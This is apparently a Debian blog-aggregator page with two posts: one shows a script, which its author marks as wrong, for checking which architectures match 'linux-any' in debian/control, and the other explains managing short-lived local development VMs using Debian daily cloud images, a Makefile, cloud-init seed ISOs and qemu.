Usually Architecture: any is recommended in debian/control except upstream explicitly doesn't/won't support that architecture. In practical use case, linux-any is useful to exclude hurd architecture. (Previously it is also useful to exclude kfreebsd) Here is the simple script to check whether specific architecutre matches linux-any or not.
2024/12/28: UPDATE I've got feedback that the following command should be used. (Thanks Cyril Brulebois and Guillem Jover)
dpkg-architecture -L -W linux-any
or
dpkg-architecture --match-wildcard linux-any --list-known
NOTE: the following example is wrong, but for a record what I did wrongly, keep it as is:
#!usr/bin/bash
TARGETS="
amd64
arm64
armel
armhf
i386
mips64el
ppc64el
riscv64
s390x
alpha
hppa
hurd-amd64
hurd-i386
loong64
m68k
powerpc
ppc64
sh4
sparc64
x32
"
for d in $TARGETS; do
    dpkg-architecture -i linux-any -a $d
    if [ $? -eq 0 ]; then
    echo -e "[\e[32m\e[40mOK\e[0m] $d is linux-any (dpkg-architecture -i linux-any -a $d)"
    else
    echo -e "[\e[31m\e[40mNG\e[0m] $d is NOT linux-any (dpkg-architecture -i linux-any -a $d)"
    fi
done
screenshot of shell script

20 December 2024

Noah Meyerhans: Local Development VM Management

A coworker asked recently about how people use VMs locally for dev work, so I figured I d take a few minutes to write up a bit about what I do. There are many use cases for local virtual machines in software development and testing. They re self-contained, meaning you can make a mess of them without impacting your day-to-day computing environment. They can run different distributions, kernels, and even entirely different operating systems from the one you use regularly. Etc. They re also cheaper than cloud services and provide finer grained control over the resources. I figured I d share a little bit about how I manage different virtual machines in case anybody finds this useful. This is what works for me, but it won t necessarily work for you, or maybe you ve already got something better. I ve found it to be easy to work with, light weight, and is easy to evolve my needs change.

Use short-lived VMs Rather than keep a long-lived development VM around that you customize over time, I recommend automating the common customizations and provisioning new VMs regularly. If I m working on reproducing a bug or testing a change prior to submitting it upstream, I ll do this work in a VM and delete the VM when when I m done. When provisioning VMs this frequently, though, walking through the installation process for every new VM is tedious and a waste of time. Since most of my work is done in Debian, so I start with images generated daily by the cloud team. These images are available for multiple releases and architectures. The nocloud variant boots to a root prompt and can be useful directly, or the generic images can be used for cloud-init based customization.

Automating image preparation This makefile lets me do something like make image and get a new qcow2 image with the latest build of a given Debian release (sid by default, with others available by specifying DIST).
DATESTAMP=$(shell date +"%Y-%m-%d")
FLAVOR?=generic
ARCH?=$(shell dpkg --print-architecture)
DIST?=sid
RELEASE=$(DIST)
URL_PATH=https://cloud.debian.org/images/cloud/$(DIST)/daily/latest/
ifeq ($(DIST),trixie)
RELEASE=13
endif
ifeq ($(DIST),bookworm)
RELEASE=12
endif
ifeq ($(DIST),bullseye)
RELEASE=11
endif
debian-$(DIST)-$(FLAVOR)-$(ARCH)-daily.tar.xz:
curl --fail --connect-timeout 20 -LO \
$(URL_PATH)/debian-$(RELEASE)-$(FLAVOR)-$(ARCH)-daily.tar.xz
$(DIST)-$(FLAVOR)-$(DATESTAMP).qcow2: debian-$(RELEASE)-$(FLAVOR)-$(ARCH)-daily.tar.xz
tar xvf debian-$(RELEASE)-$(FLAVOR)-$(ARCH)-daily.tar.xz
qemu-img convert -O qcow2 disk.raw $@
rm -f disk.raw
qemu-img resize $@ 20g
qemu-img snapshot -c untouched $@
image: $(DIST)-$(FLAVOR)-$(DATESTAMP).qcow2
.PHONY: image

Customize the VM environment with cloud-init While the nocloud images can be useful, I typically find that I want to apply the same modifications to each new VM I launch, and they don t provide facilities for automating this. The generic images, on the other hand, run cloud-init by default. Using cloud-init, I can create my user account, point apt at local mirrors, install my preferred tools, ensure the root filesystem is resized to make full use of the backing storage, etc. The cloud-init configuration on the generic images will read from a local config drive, which can contain an ISO9660 (cdrom) filesystem image. This image can be generated from a subdirectory containing the various cloud-init input files using the following make syntax:
IMDS_FILES=$(shell find seedconfig -path '*/.git/*' \
-prune -o -type f -name '*.in.json' -print) \
seedconfig/openstack/latest/user_data
seed.iso: $(IMDS_FILES)
genisoimage -V config-2 -o $@ -J -R -m '*~' -m '.git' seedconfig
With the image in place, the VM can be created with
 qemu-system-x86_64 -machine q35,accel=kvm
-cpu host -m 4g -drive file=$ img ,index=0,if=virtio,media=disk
-drive file=seed.iso,media=cdrom,format=raw,index=2,if=virtio
-nic user -nographic
This invokes qemu with the root volume and ISO image attached as disks, uses an emulated q35 machine with the host s CPU and KVM acceleration, the userspace network stack, and a serial console. The first time the VM boots, cloud-init will apply the configuration from the cloud-config available in the ISO9660 filesystem.

Alternatives to cloud-init virt-customize is another tool accomplishing the same type of customization. I use cloud-init because it works directly with cloud providers in addition to local VM images. You could also use something like ansible.

Variations I have a variant of this that uses a bridged network, which I ll write more about later. The bridge is nice because it s more featureful, with full support for IPv6, etc, but it needs a bit more infrastructure in place. It also can be helpful to use 9p or virtfs to share filesystem state between the host the VM. I don t tend to rely on these, and will instead use rsync or TRAMP for moving files around. Containers are also useful, of course, and there are plenty of times when the full isolation of a VM is not worth the overhead.

Next.

Previous.